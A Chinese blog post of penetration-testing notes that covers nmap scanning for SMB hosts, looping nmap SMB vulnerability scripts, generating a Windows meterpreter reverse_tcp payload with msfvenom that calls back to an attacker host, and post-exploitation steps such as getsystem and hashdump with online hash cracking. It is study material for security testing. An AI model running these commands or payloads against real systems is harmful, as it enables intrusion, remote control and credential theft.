美文网首页
渗透测试思路一些总结

渗透测试思路一些总结

作者: sum3mer | 来源:发表于2017-08-10 22:35 被阅读0次

整体思路转自:paper.tuisec.win/detail-119767e6b79612b.html 

扫描C段或B段网段存活主机,www.jianshu.com/writer#/notebooks/11379001/notes/15623216

或利用nmap扫描存在smb服务的主机(这里主要测试存在smb漏洞的主机)

nmap -A -p 139,445 x.x.x.1-254 -oG smb_service.txt

其中,-A 代表扫描版本号和系统

-oG 输出到文件

cat smb_service.txt | grep 'windows' | cut -d " " -f2 > smb_service_host.txt

cut命令类似于awk的作用,-d 分隔符,-d " "以空格为分隔标志。-f 2选择第二个

扫描存在smb漏洞的主机

find / -name smb*vuln*.nse 查找nse脚本文件

for vul in$(find / -name smb*vuln*.nse | cut -d"/"-f 6);do nmap -v -p 139,445 --script=$vul -iL smb_server_host.txt -oN smb_vulns_$vul.txt;done

nmap -iL 输入文件

-oN 输出文件

漏洞利用

若成功,则返回shell

但此shell不稳当,要想办法获得meterpreter,获得更强大的功能

后渗透

得到初步的shell后,检查目标系统的操作系统版本,以生成对应版本的木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f exe -a x64 --platform win -o mp_64.exe

上传meterpreter的木马到攻击机的/var/www/html下,方便下载

重新开启一个msfconsole并开启监听。


重要一步:利用不稳当的shell创建一个powershell用于下载我们的meterpreter木马

ps怎么写?(还未研究)

仿照原文作者大牛写的,

下载成功,运行木马文件l.exe,成功获得meterpreter

meterpreter后渗透,getuid,getsystem(提权)、shell获取shell,hashdump获取hash密码,并可通过http://www.objectif-securite.ch/en/ophcrack.php一个在线的LMHash破解网站

相关文章

  • 渗透测试思路一些总结

    整体思路转自:paper.tuisec.win/detail-119767e6b79612b.html 扫描C段或...

  • 渗透测试思路总结

    一、说明 《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,但感觉在多次...

  • 登陆页面渗透测试常见的几种思路与总结!

    登陆页面渗透测试常见的几种思路与总结! 前言 我们在进行渗透测试的时候,常常会遇到许多网站站点,而有的网站仅仅是基...

  • 渗透测试岗位面试题(渗透思路)

    转载自公众号:alisrc 1.拿到一个待检测的站,你觉得应该先做什么? 2.判断出网站的CMS对渗透有什么意义?...

  • 渗透测试岗位面试题(渗透思路)

    题目很多就没有去做排版了 有些题目可能有点老了,但是干货还是挺多的! 建议收藏下,后续可能会用得到! 1.拿到一个...

  • 网络渗透测试常见的三种类型分别是什么?

    渗透测试分为网络渗透测试、Web应用渗透测试、移动应用渗透测试三大类,那么网络渗透测试分为几种类型呢?以下为大家做...

  • 基础知识

    基础知识 What's 渗透测试 渗透测试(penetration test)并没有一个标准的定义,国外一些安全组...

  • Metasploit基础

    渗透测试流程和类型 渗透测试流程 渗透测试执行标准(PTES:Penetration Testing Execut...

  • 带你入门渗透测试的5个项目

    渗透测试简介: 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用...

  • web测试基本功能点

    二.常见功能点测试思路 根据经验,总结常见的功能点的测试思路: 1. 新增 或 创建(Add or Create)...

网友评论

      本文标题:渗透测试思路一些总结

      本文链接:https://www.haomeiwen.com/subject/kkjkrxtx.html